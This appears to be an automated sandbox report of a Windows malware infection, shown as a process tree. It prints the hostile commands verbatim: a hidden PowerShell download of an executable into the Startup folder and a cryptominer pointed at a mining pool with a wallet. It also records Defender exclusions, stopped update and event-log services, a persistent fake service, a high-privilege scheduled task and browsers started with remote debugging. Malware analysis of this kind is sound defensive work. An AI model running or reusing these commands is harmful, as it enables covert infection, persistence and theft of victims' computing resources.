                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3244 /prefetch:1
                                                                                                                                                        5⤵
                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                        PID:5352
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                                                                                        5⤵
                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                        PID:2964
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4300 /prefetch:2
                                                                                                                                                        5⤵
                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                        PID:3212
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4464,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4452 /prefetch:1
                                                                                                                                                        5⤵
                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                        PID:3472
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5160,i,13166397040491620622,14894519733538319667,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5168 /prefetch:8
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4236
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                        4⤵
                                                                                                                                                        • Uses browser remote debugging
                                                                                                                                                        PID:3640
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7fff355af208,0x7fff355af214,0x7fff355af220
                                                                                                                                                          5⤵
                                                                                                                                                            PID:2340
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3952,i,4466220696958267221,208094425748043728,262144 --variations-seed-version --mojo-platform-channel-handle=3676 /prefetch:2
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4424
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,4466220696958267221,208094425748043728,262144 --variations-seed-version --mojo-platform-channel-handle=3984 /prefetch:3
                                                                                                                                                              5⤵
                                                                                                                                                                PID:7124
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2328,i,4466220696958267221,208094425748043728,262144 --variations-seed-version --mojo-platform-channel-handle=4080 /prefetch:8
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:7144
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3052,i,4466220696958267221,208094425748043728,262144 --variations-seed-version --mojo-platform-channel-handle=4104 /prefetch:1
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                                  PID:7160
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3060,i,4466220696958267221,208094425748043728,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:1
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                                  PID:7152
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10208680101\JFN8FJt.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10208680101\JFN8FJt.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:452
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5108
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10211000101\5JIc3BN.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10211000101\5JIc3BN.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:6704
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8EDD.tmp\8EDE.tmp\8EDF.bat C:\Users\Admin\AppData\Local\Temp\10211000101\5JIc3BN.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6784
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_init.exe'}"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:6960
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_init.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_init.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4960
                                                                                                                                                                      • C:\Windows\System32\notepad.exe
                                                                                                                                                                        --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6628
                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                          tasklist /FI "PID eq 6628"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                          PID:7388
                                                                                                                                                                        • C:\Windows\System32\notepad.exe
                                                                                                                                                                          --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=90
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6320
                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                            tasklist /FI "PID eq 6320"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                            PID:13380
                                                                                                                                                                          • C:\Windows\System32\notepad.exe
                                                                                                                                                                            --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=90
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:14088
                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                              tasklist /FI "PID eq 14088"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                              PID:6332
                                                                                                                                                                            • C:\Windows\System32\notepad.exe
                                                                                                                                                                              --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:14320
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10213921101\IgTUAvH.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10213921101\IgTUAvH.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1200
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\mine.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\mine.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:6476
                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:7744
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:7664
                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:8088
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:7672
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:7944
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:8160
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:7148
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                      PID:6600
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:7280
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:7264
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:7304
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:7296
                                                                                                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                                                                                                      C:\Windows\system32\dialer.exe
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:7520
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe delete "WindowsAutHost"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:7400
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:4936
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:7600
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:1116
                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                          C:\Windows\system32\sc.exe start "WindowsAutHost"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                          PID:7164
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\debuger.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\debuger.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:7248
                                                                                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                                                                                            attrib +h +s C:\Users\Admin\AppData\Local\Temp\debuger.exe
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                            PID:7308
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10215600101\ph10F2z.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10215600101\ph10F2z.exe"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:6884
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:6856
                                                                                                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                            schtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10215600101\ph10F2z.exe" /sc onlogon /rl HIGHEST /f
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                            PID:3560
                                                                                                                                                                                          • C:\Program Files\RuntimeApp\0000015136.exe
                                                                                                                                                                                            "C:\Program Files\RuntimeApp\0000015136.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6640
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --no-sandbox --disable-extensions --disable-dev-shm-usage --disable-blink-features=AutomationControlled "--user-agent=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --enable-features=NetworkService --enable-features=WebGL --enable-features=Plugins https://shorturl.at/U6Gu3
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6492
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fff3572dcf8,0x7fff3572dd04,0x7fff3572dd10
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6540
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2256,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:2
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:6524
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --field-trial-handle=2316,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:5576
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --field-trial-handle=2332,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2324 /prefetch:8
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:424
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2872,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2868 /prefetch:1
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:316
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2900,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:1
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:4700
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3016,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2852 /prefetch:1
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:6204
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-databases --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3520,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:2
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:6432
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3512,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:2
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:1460
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=2992,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2856 /prefetch:2
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:552
                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.72.93 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\Temp\HeadlessChrome6492240707625" --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --disable-blink-features=AutomationControlled --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3044,i,5124931169395430665,17416238259355112462,262144 --enable-features=Plugins --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:3484
                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
